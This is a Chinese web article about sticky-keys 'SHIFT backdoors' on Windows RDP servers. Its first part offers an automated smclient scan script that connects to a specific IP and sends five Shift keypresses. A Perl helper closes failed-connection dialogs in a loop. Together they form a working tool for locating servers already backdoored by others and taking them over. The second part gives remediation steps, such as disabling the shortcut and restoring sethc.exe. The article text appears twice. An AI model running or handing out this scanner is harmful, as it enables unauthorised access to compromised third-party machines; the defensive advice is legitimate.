3389远程终端的SHIFT后门自动扫描[自动关闭错误连
网络安全 2021-07-03 09:19www.168986.cn网络安全知识
3389的SHIFT后门极少
大部分SHIFT后门都加密
所以手工一个一个尝试是挺傻的,写成自动扫描的话,还能让人忍受
需要用到的工具 smclient -f:shift_backdoor.txt -s:125.91.15.254 -l:1 -v -d
shift_backdoor.txt
job
{
connect("","","",1,1);
sleep(2000);
senddata("WM_KEYDOWN",16,2752513);
senddata("WM_KEYUP",16,3223977985);
senddata("WM_KEYDOWN",16,2752513);
senddata("WM_KEYUP",16,3223977985);
senddata("WM_KEYDOWN",16,2752513);
senddata("WM_KEYUP",16,3223977985);
senddata("WM_KEYDOWN",16,2752513);
senddata("WM_KEYUP",16,3223977985);
senddata("WM_KEYDOWN",16,2752513);
senddata("WM_KEYUP",16,3223977985);
sleep(2000);
disconnect();
}
有些SHIFT后门被改成了按7次SHIFT,或者是WIN+U后门,改改shift_backdoor.txt把功能加进去即可
自动关闭错误连接
#!/usr/bin/perl
use warnings;
use Win32::GUI;
use constant WM_CLOSE => 16;
sub monitor {
my $handle = Win32::GUI::FindWindow('', '中断远程桌面连接');
Win32::GUI::SendMessage($handle, WM_CLOSE, 0, 0);
}
sub monitor1 {
my $handle = Win32::GUI::FindWindow('', '断开 Windows 会话');
Win32::GUI::SendMessage($handle, WM_CLOSE, 0, 0);
}
while(1){
&monitor;
&monitor1;
sleep(2);
}
shift后门的解决办法
一日在网上看到了shift后门,说是按5下shift键服务器的系统盘就蹦出来了,不用输入密码!我一看,就怀着好奇的想法试了下果真如此,难怪我们的服务器总是出问题,查了下解决办法现在发出来,希望和我一样的菜鸟X级网管能有用。
打开控制面板--辅助功能选项--粘滞键--设置--去掉使用快捷键的勾
还有要改下copy.exe的权限,不过在这里推荐大家把c盘所有的程序都 改下,只有administrator才能访问
shift后门的预防解决办法预防很简单的,连敲5次shift,然后在弹出的设置里面取消连滞键
已经中了的话
attrib c:\windows\system32\sethc.exe -h
attrib c:\windows\system32\dllcache\sethc.exe -h
拷贝新的 c:\windows\system32\sethc.exe 文件到 c:\windows\system32\目录下;拷贝新的c:\windows\system32\dllcache\sethc.exe到c:\windows\system32\dllcache\目录下
收工!
大部分SHIFT后门都加密
所以手工一个一个尝试是挺傻的,写成自动扫描的话,还能让人忍受
需要用到的工具 smclient -f:shift_backdoor.txt -s:125.91.15.254 -l:1 -v -d
shift_backdoor.txt
job
{
connect("","","",1,1);
sleep(2000);
senddata("WM_KEYDOWN",16,2752513);
senddata("WM_KEYUP",16,3223977985);
senddata("WM_KEYDOWN",16,2752513);
senddata("WM_KEYUP",16,3223977985);
senddata("WM_KEYDOWN",16,2752513);
senddata("WM_KEYUP",16,3223977985);
senddata("WM_KEYDOWN",16,2752513);
senddata("WM_KEYUP",16,3223977985);
senddata("WM_KEYDOWN",16,2752513);
senddata("WM_KEYUP",16,3223977985);
sleep(2000);
disconnect();
}
有些SHIFT后门被改成了按7次SHIFT,或者是WIN+U后门,改改shift_backdoor.txt把功能加进去即可
自动关闭错误连接
复制代码
代码如下:#!/usr/bin/perl
use warnings;
use Win32::GUI;
use constant WM_CLOSE => 16;
sub monitor {
my $handle = Win32::GUI::FindWindow('', '中断远程桌面连接');
Win32::GUI::SendMessage($handle, WM_CLOSE, 0, 0);
}
sub monitor1 {
my $handle = Win32::GUI::FindWindow('', '断开 Windows 会话');
Win32::GUI::SendMessage($handle, WM_CLOSE, 0, 0);
}
while(1){
&monitor;
&monitor1;
sleep(2);
}
shift后门的解决办法
一日在网上看到了shift后门,说是按5下shift键服务器的系统盘就蹦出来了,不用输入密码!我一看,就怀着好奇的想法试了下果真如此,难怪我们的服务器总是出问题,查了下解决办法现在发出来,希望和我一样的菜鸟X级网管能有用。
打开控制面板--辅助功能选项--粘滞键--设置--去掉使用快捷键的勾
还有要改下copy.exe的权限,不过在这里推荐大家把c盘所有的程序都 改下,只有administrator才能访问
shift后门的预防解决办法预防很简单的,连敲5次shift,然后在弹出的设置里面取消连滞键
已经中了的话
attrib c:\windows\system32\sethc.exe -h
attrib c:\windows\system32\dllcache\sethc.exe -h
拷贝新的 c:\windows\system32\sethc.exe 文件到 c:\windows\system32\目录下;拷贝新的c:\windows\system32\dllcache\sethc.exe到c:\windows\system32\dllcache\目录下
收工!
上一篇:CSRF的攻击方式详解 黑客必备知识
下一篇:服务器 提权方法大全
网络安全培训
- 网络安全带来的危害 网络安全的弊处
- 如何加强网络安全防范
- 网络安全防护知识内容摘要
- 什么网络安全指的是什么 网络安全指的是什么意
- 网络安全十大公司排名 网络安全十大公司排名绿
- 手机网络安全警示格言 手机网络安全警示教育片
- 网络安全培训心得体会 网络安全知识培训
- 如何树立正确的网络意识 怎么样正确对待网络
- 网络安全大赛是什么意思 网络安全大赛比赛规则
- 世界网络安全公司排名 世界十大网络安全上市公
- 网络安全注意事项知识 网络安全注意事项知识短
- 网络安全常识十条口诀 小学生安全十句话
- 网络安全等级保护三级 网络安全三级等保标准
- 如何增强网络安全防范意识 如何增强网络安全防
- 网络安全注意事项有哪些 网络安全应注意事项
- 网络安全培训感悟 网络安全培训后的收获和感想